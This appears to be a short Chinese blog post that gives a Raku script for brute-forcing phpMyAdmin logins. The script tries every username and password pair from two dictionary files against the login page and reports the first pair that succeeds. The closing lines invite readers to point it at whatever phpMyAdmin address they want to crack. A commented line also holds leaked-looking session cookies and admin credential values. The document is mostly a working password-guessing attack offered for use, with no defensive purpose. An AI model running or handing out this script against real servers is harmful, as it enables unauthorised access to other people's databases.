use HTTP::UserAgent; my $ua = HTTP::UserAgent.new; my $url = ‘http://localhost/phpMyAdmin/index.php‘;#phpmyadmin登录网址 my @password = lines ‘password.txt‘.IO;#密码文件为password.txt my @username = lines ‘username.txt‘.IO; #$ua.cookies.set-cookie(‘Set-Cookie:phpMyAdmin=4vd2oee7t866juc4mhdgh1f2krfjrg19; pma_lang=zh_CN; pma_mcrypt_iv=fQrWZU8NfOY%3D; pmaUser-1=%2FvfpAdZXYMk%3D; ui_session=2986ad8c0a5b3df4d7028d5f3c06e936c5963aaa3a167b3ee0278412688165d0ddb6c3ff6bbb1205814c276b222aaa72f04e2e57eb2ebefe0b0f8471d877ef955; deviceid=1499131713523; xinhu_ca_adminuser=admin; xinhu_ca_rempass=1; xinhu_ca_adminpass=hh0bg0hd0wtt0hb0lb0bz0zn09‘); for @username X @password -> ($username, $password) { say ‘Check: ‘~$username~‘ and ‘~$password; my %data = :pma_username($username),:pma_password($password),:server,:token<c772cbc73b0aa39a08e6b772e87ab224>; my $result = $ua.post($url, %data); if ($result.content ~~ /‘phpMyAdmin is more friendly with‘/) { say ‘Login Ok!‘; say ‘--> ‘~$username~‘:‘~$password; exit; } }
运行效果如下所示:
这个 X 操作符实在太方便了。
里面的phpmyadmin改成你要破解的地址
username.txt / password.txt 改成你要的字典就行。
时间: 2024-11-09 17:39:34